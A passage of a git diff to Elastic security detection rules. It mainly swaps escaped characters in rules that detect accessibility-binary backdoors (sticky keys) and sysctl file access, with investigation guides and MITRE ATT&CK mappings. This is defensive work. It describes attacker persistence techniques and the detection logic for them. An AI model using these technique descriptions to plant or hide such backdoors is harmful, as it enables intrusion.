user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_108.json b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_108.json index c14b50e3e93..5043a12e906 100644 --- a/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_108.json +++ b/packages/security_detection_engine/kibana/security_rule/7405ddf1-6c8e-41ce-818f-48bea6bcaed8_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Modification of Accessibility Binaries", - "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Modification of Accessibility Binaries\n\nAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nMore details can be found [here](https://attack.mitre.org/techniques/T1546/008/).\n\nThis rule looks for the execution of supposed accessibility binaries that don't match any of the accessibility features binaries' original file names, which is likely a custom binary deployed by the attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : (\"Utilman.exe\", \"winlogon.exe\") and user.name == \"SYSTEM\" and\n process.args :\n (\n \"C:\\\\Windows\\\\System32\\\\osk.exe\",\n \"C:\\\\Windows\\\\System32\\\\Magnify.exe\",\n \"C:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"C:\\\\Windows\\\\System32\\\\Sethc.exe\",\n \"utilman.exe\",\n \"ATBroker.exe\",\n \"DisplaySwitch.exe\",\n \"sethc.exe\"\n )\n and not process.pe.original_file_name in\n (\n \"osk.exe\",\n \"sethc.exe\",\n \"utilman2.exe\",\n \"DisplaySwitch.exe\",\n \"ATBroker.exe\",\n \"ScreenMagnifier.exe\",\n \"SR.exe\",\n \"Narrator.exe\",\n \"magnify.exe\",\n \"MAGNIFY.EXE\"\n )\n\n/* uncomment once in winlogbeat to avoid bypass with rogue process with matching pe original file name */\n/* and process.code_signature.subject_name == \"Microsoft Windows\" and process.code_signature.status == \"trusted\" */\n", "references": [ "https://www.elastic.co/blog/practical-security-engineering-stateful-detection" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "7405ddf1-6c8e-41ce-818f-48bea6bcaed8", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_102.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_102.json index 89436af2fa9..3cbe032a9b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_102.json +++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_103.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_103.json index 7f19255c639..c91cfd9f279 100644 --- a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_104.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_104.json index a741e20f5b8..aa4db8e0b96 100644 --- a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_105.json b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_105.json index 4975d0334bb..faba9e77b3b 100644 --- a/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1_105.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_102.json b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_102.json index 5b3a8d2c5a0..010a6298b7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_102.json @@ -30,7 +30,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_103.json b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_103.json index 52db3651908..c89b9bac07e 100644 --- a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_103.json @@ -30,7 +30,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_104.json b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_104.json index c722b231110..ee4300ea92d 100644 --- a/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/745b0119-0560-43ba-860a-7235dd8cee8d_104.json @@ -44,7 +44,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_101.json b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_101.json index 6e3730ac1bf..67ca88756d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_101.json +++ b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_102.json b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_102.json index 1de6110e0ab..9611ad284d5 100644 --- a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_102.json +++ b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_102.json @@ -27,7 +27,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_103.json b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_103.json index 9bf3fa5f1f0..0f214e5247a 100644 --- a/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_103.json +++ b/packages/security_detection_engine/kibana/security_rule/746edc4c-c54c-49c6-97a1-651223819448_103.json @@ -37,7 +37,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_1.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_1.json index 73db05ab465..abb4161d8fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_1.json +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Sysctl File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"read-file\", \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\", \"/etc/sysctl.d\", \"/etc/sysctl.d/*\") and not process.name == \"auditbeat\"\n", "required_fields": [ { @@ -38,7 +38,7 @@ ], "risk_score": 21, "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_103.json b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_103.json index beb3b10e3fe..4bded2e386b 100644 --- a/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7592c127-89fb-4209-a8f6-f9944dfd7e02_103.json @@ -20,7 +20,7 @@ "process.executable", "file.path" ], - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n\n```\n-w /etc/sysctl.conf -p wa -k sysctl\n-w /etc/sysctl.d -p wa -k sysctl\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type:linux and event.category:file and event.action:(\"opened-file\" or \"read-file\" or \"wrote-to-file\") and\nfile.path : (\"/etc/sysctl.conf\" or \"/etc/sysctl.d\" or /etc/sysctl.d/*)\n", "required_fields": [ { @@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "7592c127-89fb-4209-a8f6-f9944dfd7e02", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules 